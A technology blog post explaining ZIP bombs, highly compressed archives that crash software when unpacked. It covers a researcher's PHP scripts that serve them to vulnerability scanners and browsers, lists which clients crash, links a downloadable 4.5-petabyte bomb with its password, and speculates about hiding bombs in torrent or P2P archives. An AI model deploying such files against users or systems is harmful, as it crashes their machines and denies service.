Zip Bomb Education 101

Share on facebook
Share on twitter
Share on linkedin
Share on pinterest
In Technology News by FL Computer Tech

Chrome Crash

Webmasters can use so-called ZIP bombs to crash a hacker’s vulnerability and port scanner and prevent him from gaining access to their website.

The term “ZIP bomb” refers to nested ZIP archives that when unzipped are decompressed to huge files that the victim’s computer cannot process in its memory or cannot store on disk.

For example, a 4.5 petabyte file containing only zeroes can be easily compressed to 42 kilobytes because the ZIP compression system can handle repetitive data extremely well.

ZIP bombs used in the past to crash antiviruses.

ZIP bombs have been used in the past decades as a way to crash antivirus software, which is configured to scan ZIP files by decompressing the file and looking at its content.

While antivirus clients have gained protection against ZIP bombs, other software has not, such as web browsers or vulnerability scanners like Nikto, SQLMap, or others.

Austrian tech expert Christian Haschek has put together two PHP scripts that will scan for particular user-agent strings and deliver ZIP bombs to vulnerability scanners or web browsers trying to access secure or private web pages (such as admin panels, backends, or pages with login forms).

These scripts will replace the normal page hackers would expect to find with a ZIP bomb. Once their clients receive the ZIP bomb, they’ll try to process the data and crash the attacker’s software.

Most browsers and scanners will crash
Here’s a list put together by Haschek that details how some clients will behave when encountering a ZIP bomb.

Client Results

  • IE 11 Memory rises, IE crashes
  • Chrome Memory rises, error shown
  • Edge Memory rises, then dips and
  • loads forever
  • Nikto Seems to scan fine but no output is reported
  • SQLmap High memory usage until crash
  • Safari Hight memory usage then crashes and reloads, then memory rises again, etc..
  • Chrome (Android) Memory rises, error shown

 


The two sample PHP files needed to set up a ZIP bomb for vulnerability scanners are available on Haschek’s blog. FL Computer Tech’s Copy of a 4.5 Petabyte file can be downloaded here. The password is:42. A word of caution, this file is for testing and lab purposes only. You assume the risk if it locks up your computer. Here is an Infographic on what a Petabyte is in terms of data storage size. It is quite impressive.

 

What is even more impressive is that a file 4.5 Petabytes in size (see Infographic to the left) can be stored or “compressed” into a zip file on 41.8 KB in size. Using this principle it is likely that by placing Zip Bombs in a “Honey Pot” on corporate servers and web servers would yield favorable results. On the opposite side of the spectrum is a Zip Bomb were to be included or added to a compressed file in either .zip or .rar format from a popular torrent website or P2P file sharing website, it could theoretically cause some serious issues. This would only wreak possible havoc and perhaps frustration but since it would not be profitable it probably wouldn’t occur unless this applied theory was magnified greatly in which it could be used in some form of a Cyber Attack although these as only speculations.

 

So, there you have it! In comparison, I would say it’s like taking New York City and fitting it into your carry-on luggage. If you got to the hotel and decided to unpack your luggage and New York City came spilling out into your room, you see how that might pose an issue right? Think micro-miny into monstrous monstrosity!

Don’t forget to follow-us @FLComputertech!

 

Administrator

Administrator

Leave a Replay

Author's Bio

Michael Duff is the CEO for FL Computer Tech. His latest endeavors have incorporated voice technology and Artificial Intelligence for Amazon and Google. When he is not in an office he enjoys world travel while living a Digital Nomad’s lifestyle, always on the lookout for a new Startup opportunity.

Recent Posts

Customer Story: Park Place Technologies builds personal relationships to drive global sales

How does Park Place Technologies maintain an 97% customer satisfaction rate? According to them, it’s all about building strong, genuine relationships with their customers.

A huge component of this relationship building process is Dynamics 365. By understanding their prospective customers holistically and tracking all past interactions, sales reps can make more confident and meaningful calls to their prospects, increasing the quality and ROI of conversations.

At FL Computer Tech, we want to help you give your sales reps the tools to succeed. Contact us to learn more.

Read More »

Top 10 Security Deployment Actions with Microsoft 365

Threats come from all areas, from malware attacks to compromised user credentials, and even accidental data leaks caused by human error. Naturally, it follows that an effective security system should have tools to cover all these areas.

Using tools like Azure Active Directory and Single Sign On, you can protect your system from common user credential problems while Azure Information Protection can keep your data encrypted and secure even if it’s shared outside of your system.

We understand the security problems facing your business are far from simple, which is why our multifaceted solution contains tools to address each one.

Read More »

Office 365 keeps your business compliant – around the clock

Data security is a very serious and very personal concern for your customers. With Microsoft 365, you can show your customers your genuine commitment to their data security.

Microsoft is confident and committed to its security solutions. They offer phone support for critical issues 24/7 that can be taken all the way up to the Office 365 development team, depending on your subscription. You can feel confident with the support you need to keep your customer data secure.

At FL Computer Tech, we want to help your business build strong trust with your customers. Contact us to learn more.

Read More »

Follow Us

Video Archive

Sign up for our Newsletter

Looking for the latest in technology news? Do you like tips, tricks and shortcuts? Sign up today!